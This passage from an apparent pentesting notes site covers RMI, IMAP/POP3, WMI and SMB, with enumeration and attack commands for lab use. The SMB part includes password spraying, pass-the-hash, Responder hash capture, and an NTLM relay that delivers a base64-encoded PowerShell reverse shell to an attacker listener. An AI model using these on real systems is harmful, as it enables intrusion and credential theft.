    In this example, the name bound to the RMI server is\u00a0CustomRMIServer. It implements the\u00a0java.rmi.Remote\u00a0interface, as you would have expected. That is how one can invoke methods on the server remotely.

    remote-method-guesser is a Java RMI vulnerability scanner that is capable of identifying common RMI vulnerabilities automatically. Whenever you identify an RMI endpoint, you should give it a try:

    rmg enum $ip 9010\n
    ","tags":["java rmi","port 1090"]},{"location":"110-143-993-995-imap-pop3/","title":"Ports 110, 143, 993, 995 IMAP POP3","text":"

    With the help of the Internet Message Access Protocol (IMAP), access to emails from a mail server is possible. Unlike the Post Office Protocol (POP3).

    IMAP allows online management of emails directly on the server and supports folder structures. Therefore, protocols such as IMAP must be used for additional functionalities such as hierarchical mailboxes directly at the mail server, access to multiple mailboxes during a session, and preselection of emails. IMAP is text-based and has extended functions, such as browsing emails directly on the server. It is also possible for several users to access the email server simultaneously. IMAP works unencrypted and transmits commands, emails, or usernames and passwords in plain text. Depending on the method and implementation used, the encrypted connection uses the standard port 143 or an alternative port such as 993.

    POP3 only provides listing, retrieving, and deleting emails as functions at the email server. Depending on the method and implementation used, the encrypted connection uses the standard port 110 or an alternative port such as 995.

    ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#footprinting-imap-pop3","title":"Footprinting IMAP / POP3","text":"
    sudo nmap $ip -sV -p110,143,993,995 -sC\n
    ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#connect-to-an-imap-pop3-server","title":"Connect to an IMAP /POP3 server","text":"
    curl -k 'imaps://$ip' --user user:p4ssw0rd -v\n

    To interact with the IMAP or POP3 server over SSL, we can use openssl, as well as ncat. The commands for this would look like this:

    openssl s_client -connect $ip:pop3s\n
    openssl s_client -connect $ip:imaps\n
    ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#basic-imap-commands","title":"Basic IMAP commands","text":"
    # User's login\na LOGIN username password\n\n# Lists all directories\na LIST \"\" *\n\n# Creates a mailbox with a specified name\na CREATE \"INBOX\" \n\n# Deletes a mailbox\na DELETE \"INBOX\" \n\n# Renames a mailbox\na RENAME \"ToRead\" \"Important\"\n\n# Returns a subset of names from the set of names that the User has declared as being active or subscribed\na LSUB \"\" *\n\n# Selects a mailbox so that messages in the mailbox can be accessed\na SELECT INBOX\n\n# Exits the selected mailbox\na UNSELECT INBOX\n\n# Retrieves data (parts of the message) associated with a message in the mailbox\na FETCH <ID> all\n# If you want to retrieve the body:\na FETCH <ID> BODY.PEEK[TEXT]\n\n# Removes all messages with the `Deleted` flag set\na CLOSE\n\n# Closes the connection with the IMAP server\na LOGOUT\n
    ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#basic-pop3-commands","title":"Basic POP3 commands","text":"
    # Identifies the user\nUSER username\n\n# Authentication of the user using its password\nPASS password\n\n# Requests the number of saved emails from the server\nSTAT\n\n# Requests from the server the number and size of all emails\nLIST \n\n# Requests the server to deliver the requested email by ID\nRETR id\n\n# Requests the server to delete the requested email by ID\nDELE id\n\n# Requests the server to display the server capabilities\nCAPA\n\n# Requests the server to reset the transmitted information\nRSET\n\n# Closes the connection with the POP3 server\nQUIT\n
    ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#installing-a-mail-server-evolution","title":"Installing a mail server: Evolution","text":"
    sudo apt-get install evolution\n
    ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"111-32731-rpc/","title":"Port 111, 32731 - rpc","text":"

    Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service. See rpcclient.

    Default port: 111/TCP/UDP, 32771 in Oracle Solaris.

    RPCBind + NFS

    ","tags":["port 111","rpc","NFS","Network File System"]},{"location":"135-windows-management-instrumentation-wmi/","title":"135 wmi","text":"

    Windows Management Instrumentation (WMI) is Microsoft's implementation and also an extension of the Common Information Model (CIM), core functionality of the standardized Web-Based Enterprise Management (WBEM) for the Windows platform. WMI allows read and write access to almost all settings on Windows systems. Understandably, this makes it the most critical interface in the Windows environment for the administration and remote maintenance of Windows computers, regardless of whether they are PCs or servers. WMI is typically accessed via PowerShell, VBScript, or the Windows Management Instrumentation Console (WMIC). WMI is not a single program but consists of several programs and various databases, also known as repositories.

    "},{"location":"135-windows-management-instrumentation-wmi/#footprinting-the-service","title":"Footprinting the service","text":"

    The initialization of the WMI communication always takes place on TCP port 135, and after the successful establishment of the connection, the communication is moved to a random port. For example, the program wmiexec.py from the Impacket toolkit can be used for this.

    /usr/share/doc/python3-impacket/examples/wmiexec.py <username>:<\"password\">@$ip <hostname>\n
    "},{"location":"135-windows-management-instrumentation-wmi/#source","title":"Source","text":"

    HackTheBox Academy

    "},{"location":"137-138-139-445-smb/","title":"Ports 137, 138, 139, 445 SMB","text":"

    Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network. It runs mainly on Windows, BUT with the free software project Samba, there is also a solution that enables the use of SMB in Linux and Unix distributions and thus cross-platform communication via SMB.

    Basically a SMB server provides arbitrary parts of its local file system as shares. Therefore the hierarchy visible to a client is partially independent of the structure on the server.

    Samba is an alternative variant to the SMB server, developed for Unix-based operating system. Samba implements the Common Internet File System (CIFS) network protocol. CIFS is a \"dialect\" of SMB. In other words, CIFS is a very specific implementation of the SMB protocol, which in turn was created by Microsoft. This allows Samba to communicate with newer Windows systems. Therefore, it usually is referred to as SMB / CIFS. However, CIFS is the extension of the SMB protocol. So when we pass SMB commands over Samba to an older NetBIOS service, it usually connects to the Samba server over TCP ports 137, 138, 139, but CIFS uses TCP port 445 only. There are several versions of SMB, including outdated versions that are still used in specific infrastructures. Nowadays, modern Windows operating systems use SMB over TCP but still support the NetBIOS implementation as a failover.

    SMB Version Supported Features CIFS Windows NT 4.0 Communication via NetBIOS interface SMB 1.0 Windows 2000 Direct connection via TCP SMB 2.0 Windows Vista, Windows Server 2008 Performance upgrades, improved message signing, caching feature SMB 2.1 Windows 7, Windows Server 2008 R2 Locking mechanisms SMB 3.0 Windows 8, Windows Server 2012 Multichannel connections, end-to-end encryption, remote storage access SMB 3.0.2 Windows 8.1, Windows Server 2012 R2 SMB 3.1.1 Windows 10, Windows Server 2016 Integrity checking, AES-128 encryption
    • On Windows, SMB can run directly over port 445 TCP/IP without the need for NetBIOS over TCP/IP
    • but if Windows has NetBIOS enabled, or we are targetting a non-Windows host, we will find SMB running on port 139 TCP/IP. This means that SMB is running with NetBIOS over TCP/IP.

    In a network, each host participates in the same workgroup. A workgroup is a group name that identifies an arbitrary collection of computers and their resources on an SMB network. There can be multiple workgroups on the network at any given time. IBM developed an application programming interface (API) for networking computers called the Network Basic Input/Output System (NetBIOS). The NetBIOS API provided a blueprint for an application to connect and share data with other computers. In a NetBIOS environment, when a machine goes online, it needs a name, which is done through the so-called name registration procedure. Either each host reserves its hostname on the network, or the NetBIOS Name Server (NBNS) is used for this purpose. It also has been enhanced to Windows Internet Name Service (WINS).

    Another protocol that is commonly related to SMB is MSRPC (Microsoft Remote Procedure Call). RPC provides an application developer a generic way to execute a procedure (a.k.a. a function) in a local or remote process without having to understand the network protocols used to support the communication,

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#footprinting-smb","title":"Footprinting smb","text":"

    nmap

    sudo nmap $ip -sV -sC -p139,445\n\n# Script for nteracting with the SMB service to extract the reported operating system version.\nnmap --script smb-os-discovery.nse -p445 $ip\n\n# Service scanning\nnmap -A -p445 $ip\n

    smbmap

    # Enumerate network shares and access associated permissions.\nsmbmap -H $ip \n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#typical-attacks","title":"Typical attacks","text":"

    For some of these attacks we will use smbclient. See installation, connection and syntax in smbclient

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#1-null-attack","title":"1. Null attack","text":"
    # Connect to smb [-L|--list=HOST] : Selecting the targeted host for the connection request.\nsmbclient -L -N //$ip\n# -N: Suppresses the password prompt.\n# -L: retrieve a list of available shares on the remote host\n

    Smbclient will attempt to connect to the remote host and check if there is any authentication required. If there is, it will ask you for a password for your local username. If we do not specify a specific username to smbclient when attempting to connect to the remote host, it will just use your local machine's username.

    Without parameter -N, password will be prompted. We leave the password field blank, simply hitting Enter to tell the script to move along.

    After authenticating, we may obtain access to some typical shared folders, such as:

    ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.\n\nC$ - Administrative share for the C:\\ disk volume. This is where the operating system is hosted.\n\nIPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.\nWorkShares - Custom share. \n

    We will try to connect to each of the shares except for the IPC$ one, which is not valuable for us since it is not browsable as any regular directory would be and does not contain any files that we could use at this stage of our learning experience:

    # the use of / and \\ might be different if you need to escape some characters\nsmbclient \\\\\\\\$ip\\\\ADMIN$\n

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#2-smb2-security-levels","title":"2. smb2 security levels","text":"

    To detect it, run:

    nmap --script smb2-security-mode -p 445 $ip\n# Add -Pn to avoid firewall if needed\n

    Output:

     smb2-security-mode:\n\n|   2.02:\n\n|_    Message signing enabled but not required\n

    There are three potential results for the message signing:

    1. Message signing disabled.

    2. Message signing enabled but not required (default for SMB2).

    3. Message signing enabled and required.

    Options 1 and 2 are vulnerable to SMB relay attacks. Option 3 is the most secure option.

    In case 1, attack is similar to the first vuln. In the second case, we can bypass login, leaving in blank the password, but including the user in the request:

    smbclient -L \\\\$ip -U Administrator\n# -L: retrieve a list of available shares on the remote host\n# -U: user \n\nsmbclient -N -L \\\\$ip\n# -N: Suppresses the password prompt.\n

    Important: Sometimes some jugling is needed:

    smbclient -N -L \\\\$ip\nsmbclient -N -L \\\\\\\\$ip\nsmbclient -N -L /\\/\\$ip\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#3-signing-enabled-but-not-required","title":"3. Signing enabled but not required","text":"

    HackTheBox machine: Tactics

    After running a nmap with scripts enabled (nmap -sC -A 10.129.228.98 -Pn -p-), you get this response:

    | smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n

    This will allow us to use smbclient share enumeration without the need of providing a password when signing into the shared folder. For that we will use a well known user in Windows: Administrator.

    smbclient -L $ip -U Administrator\n

    Same thing is possible with rpcclient:

    # Connect to a remote shared folder (same as smbclient in this regard)\nrpcclient -U \"\" $ip\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#4-brute-force","title":"4. Brute force","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#user-enumeration-with-rpcclient","title":"User enumeration with rpcclient","text":"
    # Brute forcing user enumeration with rpcclient:\nfor i in $(seq 500 1100);do rpcclient -N -U \"\" $ip -c \"queryuser 0x$(printf '%x\\n' $i)\" | grep \"User Name\\|user_rid\\|group_rid\" && echo \"\";done\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#password-spraying-with-crackmapexec","title":"Password spraying with crackmapexec","text":"
    crackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success\n# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list\n# --local-auth:  if we are targetting a non-domain joined computer, we will need to use the option --local-auth.\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#module-smb_login-in-metasploit","title":"Module smb_login in metasploit","text":"

    With metasploit, use the module: auxiliary/scanner/smb/smb_login

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#5-remote-code-execution-rce-with-psexec-smbexec-crackmapexec","title":"5. Remote Code Execution (RCE) with PsExec, SmbExec, crackMapExec","text":"

    PsExec\u00a0is a tool from SysInternals Suite that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. It works because it has a Windows service image inside of its executable. It takes this service and deploys it to the admin$ share (by default) on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. Next, it starts the PSExec service on the remote machine. The PSExec service then creates a\u00a0named pipe\u00a0that can send commands to the system.

    Alternatives to PsExec from SysInternals: Impacket PsExec, Impacket SMBExec, Impacket atexec\u00a0(This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command), CrackMapExec\u00a0, Metasploit PsExec\u00a0- Ruby PsExec implementation.

    # Connect to a remote machine with a local administrator account\nimpacket-psexec administrator:'<password>'@$ip\n\n# Connect to a remote machine with a local administrator account\nimpacket-smbexec administrator:'<password>'@$ip\n\n# Connect to a remote machine with a local administrator account\nimpacket-atexec  administrator:'<password>'@$ip\n

    RCE with crackmapexec:

    #  If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec.\ncrackmapexec smb $ip -u Administrator -p '<password>' -x 'whoami' --exec-method smbexec\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#6-pass-the-hash-pth-with-crackmapexec","title":"6. Pass the Hash (PtH) with crackmapexec","text":"
    # Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>)\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#7-forced-authentication-attacks","title":"7. Forced Authentication Attacks","text":"

    We can also abuse the SMB protocol by creating a fake SMB Server to capture users' NetNTLM v1/v2 hashes. The most common tool to perform such operations is the Responder. Responder is an LLMNR, NBT-NS, and MDNS poisoner tool with different capabilities, one of them is the possibility to set up fake services, including SMB, to steal NetNTLM v1/v2 hashes.

    ./Responder.py -I [interface] -w -d\n# -I: Set interface \n# -w: Start the WPAD rogue proxy server. Default value is False\n# -d: Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False\n\n# In the HTB machine responder:\n./Responder.py -I tun0 -w -d\n

    All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.

    hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#8-ntlm-relay-attack","title":"8. NTLM relay attack","text":"

    If we capture the hash but cannot crack it, then we can try a NTLM relay attack with impacket-ntlmrelayx or Responder MultiRelay.py.

    Step 1: Set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).

    cat /etc/responder/Responder.conf | grep 'SMB ='\n

    Step 2: Launch proxy and get SAM database

    # impacket-ntlmrelayx will dump the SAM database by default\nimpacket-ntlmrelayx --no-http-server -smb2support -t $ip\n# --no-http-server:\n#  -smb2support: \n# -t: ip target\n

    Step 3: Create a PowerShell reverse shell using\u00a0https://www.revshells.com/

    # Use option to encode it in base 64\npowershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA\n

    Step 4: Use the captured hash to launch a reverse shell. Commands in impacket-ntlmrelayx can be executed with flag -c.

     impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'\n

    Step 5: Finally, launch a listener. Once the victim authenticates to our server, we poison the response and make it execute our command to obtain a reverse shell.

    nc  -lnvp 9002\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#9-smbghost","title":"9. SMBGhost","text":"

    SMBGhost\u00a0with the\u00a0CVE-2020-0796.

    The vulnerability consisted of a compression mechanism of the version SMB v3.1.1 which made Windows 10 versions 1903 and 1909 vulnerable to attack by an unauthenticated attacker. The vulnerability allowed the attacker to gain remote code execution (RCE) and full access to the remote target system. In simple terms, this is an\u00a0integer overflow\u00a0vulnerability in a function of an SMB driver that allows system commands to be overwritten while accessing memory.

    POC: https://www.exploit-db.com/exploits/48537

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#enumeration","title":"Enumeration","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#rpcclient","title":"rpcclient","text":"

    See RPC installation and basic commands.

    The rpcclient offers us many different requests with which we can execute specific functions on the SMB server to get information. A list of some of these functions can be found at rpcclient. Most importantly, anonymous access to such services can also lead to the discovery of other users (see list of commands for rpcclient tool, who can be attacked with brute-forcing in the most aggressive case.

    Brute forcing user enumeration with rpcclient:

    for i in $(seq 500 1100);do rpcclient -N -U \"\" $ip -c \"queryuser 0x$(printf '%x\\n' $i)\" | grep \"User Name\\|user_rid\\|group_rid\" && echo \"\";done\n

    Quick cheat sheet:

    # Connect to a remote shared folder (same as smbclient in this regard)\nrpcclient -U \"\" $ip\n# rpcclient -U'%' $ip\n\n# Server information\nsrvinfo\n\n# Enumerate all domains that are deployed in the network \nenumdomains\n\n# Provides domain, server, and user information of deployed domains.\nquerydominfo\n\n# Enumerates all available shares.\nnetshareenumall\n\n# Provides information about a specific share.\nnetsharegetinfo <share>\n\n# Enumerates all domain users.\nenumdomusers\n\n# Provides information about a specific user.\nqueryuser <RID>\n    # An example:\n    # rpcclient $> queryuser 0x3e8\n\n# Provides information about a specific group.\nquerygroup <ID>\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#samrdump-from-impacket","title":"samrdump from impacket","text":"

    An alternative for user enumeration would be a Python script from Impacket called samrdump.py.

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#smbmap","title":"SMBMap","text":"

    SMBMap tool is widely used and helpful for the enumeration of SMB services. Quick cheat sheet:

    # Enumerate network shares and access associated permissions.\nsmbmap -H $ip\n\n# # Enumerate network shares and access associated permissions with recursivity\nsmbmap -H $ip -r\n\n# Download a file from a specific share folder\nsmbmap -H $ip --download \"folder\\file.txt\"\n\n# Upload a file to a specific share folder\nsmbmap -H $ip --upload originfile.txt \"targetfolder\\file.txt\"\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#crackmapexec","title":"CrackMapExec","text":"

    CrackMapExec is widely used and helpful for the enumeration of SMB services.

    crackmapexec smb $ip --shares -u '' -p ''\n

    Quick cheat sheet:

    # Check if we can access a machine\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN>\n\n# Spraying password technique\ncrackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success\n# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list\n# --local-auth:  if we are targetting a non-domain joined computer, we will need to use the option --local-auth.\n\n# Check which machines we can access in a subnet\ncrackmapexec smb $ip/24 -u <username> -p <password> -d <DOMAIN>\n\n# Get sam: extract hashes from all users authenticated in the machine \ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --sam\n\n# Get the ntds.dit, given that your user has permissions\ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --ntds\n\n# See shares\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --shares\n\n# Enumerate active sessions\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --sessions\n\n# Enumerate users of the domain\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --users\n\n# Enumerate logged on users\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --loggedon-users\n\n# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n\n# Execute commands with flag -x\ncrackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#enum4linux","title":"Enum4Linux","text":"

    Complete cheat sheet. Enum4linux is another utility that supports null sessions, and it utilizes nmblookup, net, rpcclient, and smbclient to automate some common enumeration from SMB targets such as:

    ./enum4linux-ng.py 10.10.11.45 -A -C\n

    Quick cheat sheet:

    # Enumerate shares\nenum4linux.exe -S $ip\n\n# Enumerate users\nenum4linux.exe -U $ip \u00a0 \u00a0 \n\n# Enumerate machine list\nenum4linux.exe -M $ip\n\n# Display the password policy in case you need to mount a network authentification attack\nenum4linux.exe -enuP $ip\n\n# Specify username to use (default \u201c\u201d)\nenum4linux.exe -u $ip\n\n# Specify password to use (default \u201c\u201d)\nenum4linux.exe -p $ip \u00a0 \u00a0 \n\n# Also you can use brute force by adding a file\nenum4linux.exe -s /usr/share/enum4linux/share-list.txt $ip \u00a0\n\n# Do a nmblookup (similar to nbtstat)\nenum4linux.exe -n $ip \u00a0\n# In the result we see the <20> flag which means there are resources shared\n\n# Enumerates the password policy in the remote system. This is useful to use brute force\nenum4linux.exe -P $ip\n\n# Enumerates available shares\nenum4linux.exe -s $ip     \n

    If you want to run all these commands in one line:

    enum4linux.exe -a $ip\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#interacting-with-smb-using-windows-linux","title":"Interacting with SMB using Windows & Linux","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#windows","title":"Windows","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#using-the-explorer","title":"Using the explorer","text":"

    [WINKEY] + [R]\u00a0to open the Run dialog box and type the file share location, e.g.:\u00a0\\\\$IP$\\Finance\\

    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#using-cmd","title":"Using cmd","text":"
    net use n: \\\\$IP$\\Finance\n# n: map its content to the drive letter\u00a0`n`\n\n\n# Provide user and password\nnet use n: \\\\$IP$\\Finance /user:plaintext Password123\n\n# how many files the shared folder and its subdirectories contain.\ndir n: /a-d /s /b | find /c \":\\\"\n# dir   Application\n# n:    Directory or drive to search\n# /a-d  /a is the attribute and -d means not directories\n# /s    Displays files in a specified directory and all subdirectories\n# /b    Uses bare format (no heading information or summary)\n# | find /c \":\\\\\" :  count how many files exist in the directory and subdirectories\n\n# Return files that contain string \"cred\" in the name\ndir n:\\*cred* /s /b\n\n# Return files that contain string \"password\" within \nfindstr /s /i password n:\\*.*\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#using-powershell","title":"Using powershell","text":"
    # List contents of folder Finance\nGet-ChildItem \\\\$IP$\\Finance\\\n\n# Connect to a share \nNew-PSDrive -Name \"N\" -Root \"\\\\$IP\\Finance\" -PSProvider \"FileSystem\"\n\n# To provide a username and password with Powershell, we need to create a PSCredential. It offers a centralized way to manage usernames, passwords, and credentials.\n$username = 'plaintext'\n$password = 'Password123'\n$secpassword = ConvertTo-SecureString $password -AsPlainText -Force\n$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword\nNew-PSDrive -Name \"N\" -Root \"\\\\$IP\\Finance\" -PSProvider \"FileSystem\" -Credential $cred\n\n# Count elements in a folder\n(Get-ChildItem -File -Recurse | Measure-Object).Count\n\n# Return files that contain string \"cred\" in the name\nGet-ChildItem -Recurse -Path N:\\ -Include *cred* -File\n\n# Return files that contain string \"password\" within \nGet-ChildItem -Recurse -Path N:\\ | Select-String \"password\" -List\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#linux","title":"Linux","text":"
    # mount folder\nsudo mkdir /mnt/Finance\nsudo mount -t cifs -o username=plaintext,password=Password123,domain=. //$IP/Finance /mnt/Finance\n\n# As an alternative, we can use a credential file.\nmount -t cifs //$IP/Finance /mnt/Finance -o credentials=/path/credentialfile\n\n# The file credentialfile has to be structured like this:\n# username=plaintext\n# password=Password123\n# domain=.\n\n# Return files that contain string \"cred\" in the name  \nfind /mnt/Finance/ -name *cred*\n\n# Return files that contain string \"password\" within \ngrep -rn /mnt/Finance/ -ie password\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"1433-mssql/","title":"1433 msSQL","text":"

    See msSQL.

    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#enumeration","title":"Enumeration","text":"

    Basic enumeration:

    nmap -Pn -sV -sC -p1433 $ip\n

    If you don't know anything about the service:

